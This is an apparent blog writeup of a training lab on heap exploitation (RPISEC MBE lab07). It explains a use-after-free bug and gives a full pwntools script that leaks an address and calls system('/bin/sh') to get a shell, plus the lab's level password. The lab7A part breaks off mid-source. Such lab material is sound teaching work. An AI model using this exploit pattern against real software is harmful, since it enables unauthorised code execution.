{"id":386,"date":"2018-02-23T11:12:47","date_gmt":"2018-02-23T11:12:47","guid":{"rendered":"https:\/\/devel0pment.de\/?p=386"},"modified":"2018-05-20T19:54:08","modified_gmt":"2018-05-20T19:54:08","slug":"rpisec-mbe-writeup-lab06-heap-exploitation","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=386","title":{"rendered":"RPISEC\/MBE: writeup lab07 (Heap Exploitation)"},"content":{"rendered":"

After we have introduced ASLR<\/i> and ways to bypass it in the last writeup<\/a>, we will expand our exploits to the Heap<\/i> in this lab.<\/p>\n

In this lab there are only two levels:
\n–> lab7C<\/a>
\n–> lab7A<\/a><\/p>\n

<\/p>\n

\n

lab7C<\/h1>\n

We can connect to the first level of this lib using the credentials lab7C<\/span> with the password lab07start<\/span>:<\/p>\n

\r\ngameadmin@warzone:~$ sudo ssh lab7C@localhost\r\n[sudo] password for gameadmin:\r\nlab7C@localhost's password: (lab07start)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------[ contact@rpis.ec ]-----------------\r\n\r\nLast login: Thu Jan 25 02:00:14 2018 from localhost\r\n<\/pre>\n
As usual we have access to the source code:<\/p>\n
\r\nlab7C@warzone:\/levels\/lab07$ cat lab7C.c\r\n\/* compiled with: gcc -z relro -z now -fPIE -pie -fstack-protector-all -o lab7C lab7C.c *\/\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include "utils.h"\r\n\r\n#define MAX_STR 6\r\n#define MAX_NUM 6\r\n\r\nstruct data {\r\n    char reserved[8];\r\n    char buffer[20];\r\n    void (* print)(char *);\r\n};\r\n\r\nstruct number {\r\n    unsigned int reserved[6];               \/\/ implement later\r\n    void (* print)(unsigned int);\r\n    unsigned int num;\r\n};\r\n\r\nvoid small_str(char * a_str)\r\n{\r\n    printf("here's your lame string: %s\\n", a_str);\r\n}\r\n\r\nvoid big_str(char * a_str)\r\n{\r\n    printf("nice big str yo: %s\\n", a_str);\r\n}\r\n\r\nvoid small_num(unsigned int a_num)\r\n{\r\n    printf("not 1337 enough: %u\\n", a_num);\r\n}\r\n\r\nvoid big_num(unsigned int a_num)\r\n{\r\n    printf("tite number dawg: %u\\n", a_num);\r\n}\r\n\r\nvoid print_menu()\r\n{\r\n    printf("-- UAF Playground Menu ----------------------\\n"\r\n           "1. Make a string\\n"\r\n           "2. Make a number\\n"\r\n           "3. Delete a string\\n"\r\n           "4. Delete a number\\n"\r\n           "5. Print a string\\n"\r\n           "6. Print a number\\n"\r\n           "7. Quit\\n"\r\n           "---------------------------------------------\\n"\r\n           "Enter Choice: ");\r\n}\r\n\r\n\/* bugs galore... but no memory corruption! *\/\r\nint main(int argc, char * argv[])\r\n{\r\n    struct data * strings[MAX_STR] = {0};\r\n    struct number * numbers[MAX_NUM] = {0};\r\n    struct data * tempstr = NULL;\r\n    struct number * tempnum = NULL;\r\n\r\n    int strcnt = 0;\r\n    int numcnt = 0;\r\n    unsigned int choice = 0;\r\n    unsigned int index = 0;\r\n\r\n    while(1)\r\n    {\r\n        print_menu();\r\n\r\n        \/* get menu option *\/\r\n        if((choice = get_unum()) == EOF)\r\n            break;\r\n\r\n        \/* make a string *\/\r\n        if(choice == 1)\r\n        {\r\n            if(strcnt < MAX_STR)\r\n            {\r\n                tempstr = malloc(sizeof(struct data));\r\n\r\n                \/* no memory corruption this time *\/\r\n                printf("Input string to store: ");\r\n                fgets(tempstr->buffer, 20, stdin);\r\n                tempstr->buffer[strcspn(tempstr->buffer, "\\n")] = 0;\r\n\r\n                \/* pick a print function *\/\r\n                tempstr->print = strlen(tempstr->buffer) > 10 ? big_str : small_str;\r\n\r\n                \/* store the string to our master list *\/\r\n                strings[++strcnt] = tempstr;\r\n                printf("Created new string!\\n");\r\n            }\r\n            else\r\n                printf("Please delete a string before trying to make another!\\n");\r\n        }\r\n\r\n        \/* make a number *\/\r\n        else if(choice == 2)\r\n        {\r\n            if(numcnt < MAX_NUM)\r\n            {\r\n                tempnum = malloc(sizeof(struct number));\r\n\r\n                printf("Input number to store: ");\r\n                tempnum->num = get_unum();\r\n\r\n                \/* pick a print function *\/\r\n                tempnum->print = tempnum->num > 0x31337 ? big_num : small_num;\r\n\r\n                \/* store the number to our master list *\/\r\n                numbers[++numcnt] = tempnum;\r\n                printf("Created new number!\\n");\r\n            }\r\n            else\r\n                printf("Please delete a number before trying to make another!\\n");\r\n        }\r\n\r\n        \/* delete a string *\/\r\n        else if(choice == 3)\r\n        {\r\n            if(strcnt && strings[strcnt])\r\n            {\r\n                free(strings[strcnt--]);\r\n                printf("Deleted most recent string!\\n");\r\n            }\r\n            else\r\n                printf("There are no strings left to delete!\\n");\r\n        }\r\n\r\n        \/* delete a number *\/\r\n        else if(choice == 4)\r\n        {\r\n            if(numcnt && numbers[numcnt])\r\n            {\r\n                free(numbers[numcnt--]);\r\n                printf("Deleted most recent number!\\n");\r\n            }\r\n            else\r\n                printf("There are no numbers left to delete!\\n");\r\n        }\r\n\r\n        \/* print a string *\/\r\n        else if(choice == 5)\r\n        {\r\n            printf("String index to print: ");\r\n            index = get_unum();\r\n\r\n            if(index < MAX_STR && strings[index])\r\n                strings[index]->print(strings[index]->buffer);\r\n            else\r\n                printf("There is no string to print!\\n");\r\n        }\r\n\r\n        \/* print a number *\/\r\n        else if(choice == 6)\r\n        {\r\n            printf("Number index to print: ");\r\n            index = get_unum();\r\n\r\n            if(index < MAX_NUM && numbers[index])\r\n                numbers[index]->print(numbers[index]->num);\r\n            else\r\n                printf("There is no number to print!\\n");\r\n        }\r\n\r\n        \/* quit *\/\r\n        else if(choice == 7)\r\n            break;\r\n\r\n        \/* base case *\/\r\n        else\r\n            printf("Invalid choice!\\n");\r\n\r\n        index = 0;\r\n        choice = 0;\r\n        printf("\\n");\r\n    }\r\n\r\n    printf("See you tomorrow!\\n");\r\n    return EXIT_SUCCESS;\r\n}\r\n<\/pre>\n
What does the program do?
\n–> The binary is compiled with the flags -pie -fPIE<\/code> (line 1), which means that even the memory segments of the binary itself (.text<\/code>, .plt<\/code>, .got<\/code>, …) are randomized.
\n–> There are two structs: data<\/code> (lines 11-15) and number<\/code> (lines 17-21). We will look at the details shortly.
\n–> Within the main<\/code> function (line 58) a menu is displayed by calling print_menu<\/code> (line 43) giving the following options:
\n    – Making a string \/ number.
\n    – Deleting a string \/ number.
\n    – Printing a string \/ number.
\n    – Quitting the program.
\n–> When 1. Make a string<\/code> is selected (line 79), memory is allocated for a struct data<\/code> using malloc<\/code> (line 83).
\n–> The member tempstr->buffer<\/code> is filled with user input by calling fgets<\/code> (line 87).
\n–> Depending on the size of the user input the member tempstr->print<\/code> is set to the function big_str<\/code> or small_str<\/code> (line 91).
\n–> At last the address of the newly created struct data<\/code> is stored in the array strings<\/code> (line 94).
\n–> When 3. Delete a string<\/code> is selected (line 123), the formerly allocated memory is freed by calling free<\/code> (line 127).
\n–> When 5. Print a string<\/code> is selected (line 147), the user can enter an index (line 150) which is used to call the print<\/code> member-function (line 153).
\n–> Basically the same is done for numbers using the struct number<\/code>.<\/p>\n
Where is the vulnerability within the program?
\nThe memory for the instances of both structs (data<\/code> and number<\/code>) is allocated using malloc<\/code> (line 83 and 106). malloc<\/code> returns a pointer to the newly allocated memory, which is stored in the pointer array strings<\/code> \/ numbers<\/code> (line 94 and 115). When deleting a string or number, the previously allocated memory is released using free<\/code> (line 127 and 139). The one and only argument passed to free<\/code> is a pointer to a formerly allocated memory region. free<\/code> deallocates this memory region so that a subsequent call to malloc<\/code> can use this memory again. One important aspect to notice is that free<\/code> does not change the pointer being passed! This means that the pointer still refers to the now deallocated memory region. Such a pointer is called Dangling Pointer<\/i>. On a subsequent call to malloc<\/code> the memory region the pointer is referring to is allocated again, but possibly not to hold the same type of object as before. If the dangling pointer is now used to read or modify the referred object, there might actually be another type of object within the allocated memory, leading to unintended behaviour. This kind of vulnerability is called Use After Free<\/i>, because the dangling pointer is use<\/b>d to read or modify an object after<\/b> the associated memory has been free<\/b>d.<\/p>\n
The vulnerability in this level could have been fixed easily by setting the pointer within the array strings<\/code> \/ numbers<\/code> to NULL<\/code> after the call to free<\/code>. Because this has not been done, we can print an object even after it has been deleted:<\/p>\n
\r\nlab7C@warzone:\/levels\/lab07$ .\/lab7C\r\n-- UAF Playground Menu ----------------------\r\n1. Make a string\r\n2. Make a number\r\n3. Delete a string\r\n4. Delete a number\r\n5. Print a string\r\n6. Print a number\r\n7. Quit\r\n---------------------------------------------\r\nEnter Choice: 1\r\nInput string to store: AAAA\r\nCreated new string!\r\n\r\n-- UAF Playground Menu ----------------------\r\n1. Make a string\r\n2. Make a number\r\n3. Delete a string\r\n4. Delete a number\r\n5. Print a string\r\n6. Print a number\r\n7. Quit\r\n---------------------------------------------\r\nEnter Choice: 3\r\nDeleted most recent string!\r\n\r\n-- UAF Playground Menu ----------------------\r\n1. Make a string\r\n2. Make a number\r\n3. Delete a string\r\n4. Delete a number\r\n5. Print a string\r\n6. Print a number\r\n7. Quit\r\n---------------------------------------------\r\nEnter Choice: 5\r\nString index to print: 1\r\nhere's your lame string: AAAA\r\n\r\n<\/pre>\n
As this is not so crucial, things are getting worse when we create a new number after we have deleted the string and then try to print the string:<\/p>\n
\r\n...\r\nEnter Choice: 3\r\nDeleted most recent string!\r\n\r\n-- UAF Playground Menu ----------------------\r\n1. Make a string\r\n2. Make a number\r\n3. Delete a string\r\n4. Delete a number\r\n5. Print a string\r\n6. Print a number\r\n7. Quit\r\n---------------------------------------------\r\nEnter Choice: 2\r\nInput number to store: 1337\r\nCreated new number!\r\n\r\n-- UAF Playground Menu ----------------------\r\n1. Make a string\r\n2. Make a number\r\n3. Delete a string\r\n4. Delete a number\r\n5. Print a string\r\n6. Print a number\r\n7. Quit\r\n---------------------------------------------\r\nEnter Choice: 5\r\nString index to print: 1\r\nSegmentation fault (core dumped)\r\n<\/pre>\n
Segmentation fault<\/code>! Let’s have a look at the two structs data<\/code> and number<\/code> in order to think about how we can leverage this vulnerability:<\/p>\n
\"\"<\/p>\n
The image shows both structs side by side. As we already figured out, a memory region deallocated by free<\/code> is reused by a subsequent call to malloc<\/code>, which means that the former object is overwritten with the new object. So why are we getting a segmentation fault when trying to print the string after it has been overwritten with the number<\/code> struct? We can figured out what caused the segmentation fault using gdb<\/code>:<\/p>\n
\r\nlab7C@warzone:\/levels\/lab07$ gdb lab7C\r\nReading symbols from lab7C...(no debugging symbols found)...done.\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab07\/lab7C\r\n-- UAF Playground Menu ----------------------\r\n1. Make a string\r\n2. Make a number\r\n3. Delete a string\r\n4. Delete a number\r\n5. Print a string\r\n6. Print a number\r\n7. Quit\r\n---------------------------------------------\r\nEnter Choice: 1\r\nInput string to store: AAAA\r\nCreated new string!\r\n...\r\nEnter Choice: 3\r\nDeleted most recent string!\r\n...\r\nEnter Choice: 2\r\nInput number to store: 1337\r\nCreated new number!\r\n...\r\nEnter Choice: 5\r\nString index to print: 1\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x539\r\nEBX: 0xb774af98 --> 0x2ea0\r\nECX: 0xb77168a4 --> 0x0\r\nEDX: 0xb9359010 ("AAAA")\r\nESI: 0x18\r\nEDI: 0x0\r\nEBP: 0xbfa58a88 --> 0x0\r\nESP: 0xbfa589fc --> 0xb7749071 (<main+812>:     jmp    0xb77490fb <main+950>)\r\nEIP: 0x539\r\nEFLAGS: 0x10292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\nInvalid $PC address: 0x539\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbfa589fc --> 0xb7749071 (<main+812>:    jmp    0xb77490fb <main+950>)\r\n0004| 0xbfa58a00 --> 0xb9359010 ("AAAA")\r\n0008| 0xbfa58a04 --> 0xb7749357 --> 0x7243000a ('\\n')\r\n0012| 0xbfa58a08 --> 0xb7715c20 --> 0xfbad2288\r\n0016| 0xbfa58a0c --> 0x0\r\n0020| 0xbfa58a10 --> 0x1\r\n0024| 0xbfa58a14 --> 0x0\r\n0028| 0xbfa58a18 --> 0xbfa58b24 --> 0xbfa598d4 ("\/levels\/lab07\/lab7C")\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x00000539 in ?? ()\r\n<\/pre>\n
The segmentation fault is caused by an invalid instruction pointer (eip<\/code>) which contains the value 0x539<\/code> = 1337<\/code>. This is the value we enter as the new number. What happened here?<\/p>\n
At first the memory for the string is allocated, which is interpreted as a struct data<\/code>:<\/p>\n
\r\n    struct data * tempstr = NULL;\r\n<\/pre>\n
\r\n                tempstr = malloc(sizeof(struct data));\r\n<\/pre>\n
\"\"<\/p>\n
Then the user string is stored within the struct and terminated with a null-byte. After this the print<\/code> member function is set to big_str<\/code> \/ small_str<\/code>:<\/p>\n
\r\n                fgets(tempstr->buffer, 20, stdin);\r\n                tempstr->buffer[strcspn(tempstr->buffer, "\\n")] = 0;\r\n<\/pre>\n
\r\n                tempstr->print = strlen(tempstr->buffer) > 10 ? big_str : small_str;\r\n<\/pre>\n
\"\"<\/p>\n
The pointer to the struct is stored in the array strings<\/code>:<\/p>\n
\r\n                strings[++strcnt] = tempstr;\r\n<\/pre>\n
At next we have chosen 3. Delete a string<\/code>, which deallocates the memory:<\/p>\n
\r\n                free(strings[strcnt--]);\r\n<\/pre>\n
\"\"<\/p>\n
As the pointer within strings<\/code> is not changed, it still references the deallocated memory.<\/p>\n
After this we created a new number choosing 2. Make a number<\/code>. In this case malloc<\/code> is used to allocated memory for a struct number<\/code>:<\/p>\n
\r\n    struct number * tempnum = NULL;\r\n<\/pre>\n
\r\n                tempnum = malloc(sizeof(struct number));\r\n<\/pre>\n
\"\"<\/p>\n
As shown in the image, the pointer within strings<\/code> still references the memory.<\/p>\n
At next the user number is read and the appropriate print<\/code> member-function is set:<\/p>\n
\r\n                tempnum->num = get_unum();\r\n<\/pre>\n
\r\n                tempnum->print = tempnum->num > 0x31337 ? big_num : small_num;\r\n<\/pre>\n
\"\"<\/p>\n
Finally we selected 5. Print a string<\/code> which tries to call the member-function print<\/code> on the struct data<\/code>:<\/p>\n
\r\n                strings[index]->print(strings[index]->buffer);\r\n<\/pre>\n
\"\"<\/p>\n
This causes the segmentation fault since print<\/code> does not contain the valid function pointer to small_str<\/code> anymore but the number we just entered.<\/p>\n
How do we exploit this vulnerability? As we already figured out, the binary is compiled using the flags -pie -fPIE<\/code>, which means that we do not know even know an address of the binary itself during runtime. If we could leverage the vulnerability to leak a memory address, we could use this address as a reference to calculate the address of a function we would like to call. Since the libc is linked dynamically we can use the function system<\/code> as we did in lab5C<\/a> (ret2libc<\/i>):<\/p>\n
\r\ngdb-peda$ p system\r\n$1 = {<text variable, no debug info>} 0xb75ab190 <__libc_system>\r\n<\/pre>\n
Summing it up we have to:
\n(1) Leak a memory-address and calculate address of __libc_system<\/code>
\n(2) Call __libc_system<\/code> passing the string \"\/bin\/sh\"<\/code><\/p>\n
(1) leak memory-address<\/h2>\n
We basically have two possibilities to use our discovered Use After Free<\/i> vulnerability:
\n–> We can treat a struct number<\/code> as a struct data<\/code>.
\n–> We can treat a struct data<\/code> as a struct number<\/code>.<\/p>\n
The function-pointers within the structs are essential. The print<\/code> member-function of struct number<\/code> takes an unsigned integer argument which is being printed. The function is called passing the member variable num<\/code>:<\/p>\n
\r\n                numbers[index]->print(numbers[index]->num);\r\n<\/pre>\n
When we inspect both structs side by side again, we can see that num<\/code> within struct num<\/code> resides at the same offset as print<\/code> within struct data<\/code>:<\/p>\n
\"\"<\/p>\n
We can leverage this by starting to create a number:<\/p>\n
\"\"<\/p>\n
The member-function print<\/code> is now set to the address of small_num<\/code>.<\/p>\n
We directly delete this number again and create a string. As input we enter \"\/bin\/sh\"<\/code>, which we will use later. You might already guess what we will use this for \ud83d\ude09<\/p>\n
\"\"<\/p>\n
Now the memory is already set up to leak the address of small_str<\/code>! We just have to call print<\/code> on the dangling pointer to struct number<\/code>:<\/p>\n
\"\"<\/p>\n
As you can see in the image, the member num<\/code> has been overwritten with the address of small_str<\/code>, which will be printed if we choose 6. Print a number<\/code>.<\/p>\n
\r\nlab7C@warzone:\/levels\/lab07$ .\/lab7C\r\n-- UAF Playground Menu ----------------------\r\n1. Make a string\r\n2. Make a number\r\n3. Delete a string\r\n4. Delete a number\r\n5. Print a string\r\n6. Print a number\r\n7. Quit\r\n---------------------------------------------\r\nEnter Choice: 2\r\nInput number to store: 1337\r\nCreated new number!\r\n...\r\nEnter Choice: 4\r\nDeleted most recent number!\r\n...\r\nEnter Choice: 1\r\nInput string to store: \/bin\/sh\r\nCreated new string!\r\n...\r\nEnter Choice: 6\r\nNumber index to print: 1\r\nnot 1337 enough: 3077868487\r\n<\/pre>\n
With the leaked memory address we can easily calculate the address of __libc_system<\/code>:<\/p>\n
\r\ngdb-peda$ p system\r\n$1 = {<text variable, no debug info>} 0xb75ab190 <__libc_system>\r\ngdb-peda$ p small_str\r\n$2 = {<text variable, no debug info>} 0xb7748bc7 <small_str>\r\ngdb-peda$ p small_str - system\r\n$3 = 0x19da37\r\n<\/pre>\n
Thus we have to subtract 0x19da37<\/code> from the leaked address of small_str<\/code> to get the address of __libc_system<\/code>.<\/p>\n
(2) calling __libc_system<\/h2>\n
As we have the address of __libc_system<\/code> now, we just need to call it passing the string \"\/bin\/sh\"<\/code> as argument. Luckily we already stored \"\/bin\/sh\"<\/code> in the member variable buffer<\/code>. This means that we just have to put the address of __libc_system<\/code> in the right place. We do this by deleting the previously create string again and create a number entering the address of __libc_system<\/code>:<\/p>\n
\"\"<\/p>\n
The only thing left to do is to call the print<\/code> function of struct data<\/code> using the dangling pointer:<\/p>\n
\"\"<\/p>\n
The function __libc_system<\/code> gets called passing the member variable buffer<\/code>, which contains the string \"\/bin\/sh\"<\/code>.<\/p>\n
The following python-script does all this steps and calculates the address of __libc_system<\/code>:<\/p>\n
\r\nlab7C@warzone:\/levels\/lab07$ cat \/tmp\/exploit_lab7C.py\r\nfrom pwn import *\r\n\r\np = process(".\/lab7C")\r\n\r\n# *******************************************************\r\n# step 1: leak memory-address\r\n\r\np.recvuntil("Enter Choice: ")\r\np.sendline("2")                # 2. Make a number\r\np.sendline("1337")             #    --> 1337\r\np.recvuntil("Enter Choice: ")\r\np.sendline("4")                # 4. Delete a number\r\np.recvuntil("Enter Choice: ")\r\np.sendline("1")                # 1. Make a string\r\np.sendline("\/bin\/sh")          #    --> "\/bin\/sh"\r\np.recvuntil("Enter Choice: ")\r\np.sendline("6")                # 6. Print a number\r\np.sendline("1")                #    --> index = 1\r\n\r\n# --> output contains address of small_str\r\nret = p.recvuntil("Enter Choice: ")\r\naddr_small_str = int(ret[ret.index("enough: ")+8:ret.index("\\n")], 10)\r\nlog.info("addr_small_str: " + hex(addr_small_str))\r\n\r\n# --> calculate actutal address of system\r\naddr_system = addr_small_str - 0x19da37\r\n\r\n\r\n# *******************************************************\r\n# step 2: call system("\/bin\/sh")\r\n\r\np.sendline("3")               # 3. Delete a string\r\np.recvuntil("Enter Choice: ")\r\np.sendline("2")               # 2. Make a number\r\np.sendline(str(addr_system))  #    --> address of system\r\np.recvuntil("Enter Choice: ")\r\np.sendline("5")               # 5. Print a string\r\np.sendline("1")               #    --> index = 1\r\np.recv(100)\r\n\r\np.interactive()\r\n<\/pre>\n
Running the script:<\/p>\n
\r\nlab7C@warzone:\/levels\/lab07$ python \/tmp\/exploit_lab7C.py\r\n[+] Starting program '.\/lab7C': Done\r\n[*] addr_small_str: 0xb7710bc7\r\n[*] Switching to interactive mode\r\n$ whoami\r\nlab7A\r\n$ cat \/home\/lab7A\/.pass\r\nus3_4ft3r_fr33s_4re_s1ck\r\n<\/pre>\n
Done \ud83d\ude42 The password for level A is us3_4ft3r_fr33s_4re_s1ck<\/code>.<\/p>\n
\n
lab7A<\/h1>\n
We can connect to the level using the previously achieved credentials lab7A<\/span> with the password us3_4ft3r_fr33s_4re_s1ck<\/span>:<\/p>\n
\r\ngameadmin@warzone:~$ sudo ssh lab7A@localhost\r\n[sudo] password for gameadmin:\r\nlab7A@localhost's password: (us3_4ft3r_fr33s_4re_s1ck)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------[ contact@rpis.ec ]-----------------\r\n\r\nLast login: Mon Jan 22 05:48:49 2018 from localhost\r\n<\/pre>\n
Let’s have a look at the source code:<\/p>\n
\r\nlab7A@warzone:\/levels\/lab07$ cat lab7A.c\r\n\/* compiled with: gcc -static -z relro -z now -fstack-protector-all -o lab7A lab7A.c *\/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <time.h>\r\n#include "utils.h"\r\n\r\nENABLE_TIMEOUT(60)\r\n\r\n#define MAX_MSG    10\r\n#define MAX_BLOCKS 32\r\n#define BLOCK_SIZE 4\r\n\r\nstruct msg {\r\n    void (* print_msg)(struct msg *);\r\n    unsigned int xor_pad[MAX_BLOCKS];\r\n    unsigned int message[MAX_BLOCKS];\r\n    unsigned int msg_len;\r\n};\r\n\r\nstruct msg * messages[MAX_MSG];\r\n\r\n\/* apply one time pad *\/\r\nvoid encdec_message(unsigned int * message, unsigned int * xor_pad)\r\n{\r\n    int i = 0;\r\n    for(i = 0; i < MAX_BLOCKS; i++)\r\n        message[i] ^= xor_pad[i];\r\n}\r\n\r\n\/* print information about the given message *\/\r\nvoid print_message(struct msg * to_print)\r\n{\r\n    unsigned int i = 0;\r\n    char * xor_pad;\r\n    char * message;\r\n\r\n    xor_pad = (char *)&to_print->xor_pad;\r\n    message = (char *)&to_print->message;\r\n\r\n    \/* print the message's xor pad *\/\r\n    printf("\\nXOR Pad: \\n"\r\n           "-----------------------------------------\\n");\r\n\r\n    for(i = 0; i < BLOCK_SIZE*MAX_BLOCKS; i++)\r\n    {\r\n        printf("%02x", xor_pad[i] & 0xFF);\r\n        if(i % 32 == 31)\r\n            puts("");\r\n    }\r\n\r\n    \/* print encrypted message *\/\r\n    printf("\\nEncrypted Message: \\n"\r\n           "-----------------------------------------\\n");\r\n\r\n    for(i = 0; i < BLOCK_SIZE*MAX_BLOCKS; i++)\r\n    {\r\n        printf("%02x", message[i] & 0xFF);\r\n        if(i % 32 == 31)\r\n            puts("");\r\n    }\r\n\r\n    puts("");\r\n}\r\n\r\n\/* creates a message *\/\r\nint create_message()\r\n{\r\n    int i, j;\r\n    struct msg * new_msg = NULL;\r\n\r\n    \/* find a free message slot *\/\r\n    for(i = 0; i < MAX_MSG; i++)\r\n        if(messages[i] == NULL)\r\n            break;\r\n\r\n    \/* make sure we actually found an empty slot *\/\r\n    if(messages[i])\r\n    {\r\n        printf("-No message slots left!\\n");\r\n        return 1;\r\n    }\r\n\r\n    printf("-Using message slot #%u\\n", i);\r\n\r\n    \/* initialize new message *\/\r\n    new_msg = malloc(sizeof(struct msg));\r\n    memset(new_msg, 0, sizeof(struct msg));\r\n    new_msg->print_msg = &print_message;\r\n\r\n    for(j = 0; j < MAX_BLOCKS; j++)\r\n        new_msg->xor_pad[j] = rand();\r\n\r\n    \/* get the length of data the user intends to encrypt *\/\r\n    printf("-Enter data length: ");\r\n\r\n    new_msg->msg_len = get_unum();\r\n\r\n    if(new_msg->msg_len == 0)\r\n    {\r\n        printf("-Message length must be greater than zero!\\n");\r\n        free(new_msg);\r\n        return 1;\r\n    }\r\n\r\n    \/* make sure the message length is no bigger than the xor pad *\/\r\n    if((new_msg->msg_len \/ BLOCK_SIZE) > MAX_BLOCKS)\r\n        new_msg->msg_len = BLOCK_SIZE * MAX_BLOCKS;\r\n\r\n    \/* read in the message to encrypt with the xor pad *\/\r\n    printf("-Enter data to encrypt: ");\r\n    read(0, &new_msg->message, new_msg->msg_len);\r\n\r\n    \/* encrypt message *\/\r\n    encdec_message(new_msg->message, new_msg->xor_pad);\r\n\r\n    \/* save the new message to the global list *\/\r\n    messages[i] = new_msg;\r\n\r\n    return 0;\r\n}\r\n\r\nint edit_message()\r\n{\r\n    char numbuf[32];\r\n    unsigned int i = 0;\r\n\r\n    \/* get message index to destroy *\/\r\n    printf("-Input message index to edit: ");\r\n    fgets(numbuf, sizeof(numbuf), stdin);\r\n    i = strtoul(numbuf, NULL, 10);\r\n\r\n    if(i >= MAX_MSG || messages[i] == NULL)\r\n    {\r\n        printf("-Invalid message index!\\n");\r\n        return 1;\r\n    }\r\n\r\n    printf("-Input new message to encrypt: ");\r\n\r\n    \/* clear old message, and read in a new one *\/\r\n    memset(&messages[i]->message, 0, BLOCK_SIZE * MAX_BLOCKS);\r\n    read(0, &messages[i]->message, messages[i]->msg_len);\r\n\r\n    \/* encrypt message *\/\r\n    encdec_message(messages[i]->message, messages[i]->xor_pad);\r\n\r\n    return 0;\r\n}\r\n\r\n\/* free a secure message *\/\r\nint destroy_message()\r\n{\r\n    char numbuf[32];\r\n    unsigned int i = 0;\r\n\r\n    \/* get message index to destroy *\/\r\n    printf("-Input message index to destroy: ");\r\n    fgets(numbuf, sizeof(numbuf), stdin);\r\n    i = strtoul(numbuf, NULL, 10);\r\n\r\n    if(i >= MAX_MSG || messages[i] == NULL)\r\n    {\r\n        printf("-Invalid message index!\\n");\r\n        return 1;\r\n    }\r\n\r\n    \/* destroy message *\/\r\n    memset(messages[i], 0, sizeof(struct msg));\r\n    free(messages[i]);\r\n    messages[i] = NULL;\r\n\r\n    return 0;\r\n}\r\n\r\n\/* print a message at a select index *\/\r\nint print_index()\r\n{\r\n    char numbuf[32];\r\n    unsigned int i = 0;\r\n\r\n    \/* get message index to print *\/\r\n    printf("-Input message index to print: ");\r\n    fgets(numbuf, sizeof(numbuf), stdin);\r\n    i = strtoul(numbuf, NULL, 10);\r\n\r\n    if(i >= MAX_MSG || messages[i] == NULL)\r\n    {\r\n        printf("-Invalid message index!\\n");\r\n        return 1;\r\n    }\r\n\r\n    \/* print the message of interest *\/\r\n    messages[i]->print_msg(messages[i]);\r\n\r\n    return 0;\r\n}\r\n\r\n\/* the vulnerability is in here *\/\r\nvoid print_menu()\r\n{\r\n    printf("+---------------------------------------+\\n"\r\n           "|        Doom's OTP Service v1.0        |\\n"\r\n           "+---------------------------------------+\\n"\r\n           "|------------ Services Menu ------------|\\n"\r\n           "|---------------------------------------|\\n"\r\n           "| 1. Create secure message              |\\n"\r\n           "| 2. Edit secure message                |\\n"\r\n           "| 3. Destroy secure message             |\\n"\r\n           "| 4. Print message details              |\\n"\r\n           "| 5. Quit                               |\\n"\r\n           "+---------------------------------------+\\n");\r\n}\r\n\r\nint main()\r\n{\r\n    int choice = 0;\r\n    srand(time(NULL));\r\n    disable_buffering(stdout);\r\n\r\n    while(1)\r\n    {\r\n        print_menu();\r\n\r\n        \/* get menu option *\/\r\n        printf("Enter Choice: ");\r\n        choice = get_unum();\r\n\r\n        printf("-----------------------------------------\\n");\r\n\r\n        \/* handle menu selection *\/\r\n        if(choice == 1)\r\n        {\r\n            if(create_message())\r\n                printf("-Failed to create message!\\n");\r\n            else\r\n                printf("-Message created successfully!\\n");\r\n        }\r\n        else if(choice == 2)\r\n        {\r\n            if(edit_message())\r\n                printf("-Failed to edit message!\\n");\r\n            else\r\n                printf("-Message has been successfully modified!\\n");\r\n        }\r\n        else if(choice == 3)\r\n        {\r\n            if(destroy_message())\r\n                printf("-Failed to destroy message!\\n");\r\n            else\r\n                printf("-Message destroyed!\\n");\r\n        }\r\n        else if(choice == 4)\r\n        {\r\n            if(print_index())\r\n                printf("-Failed to 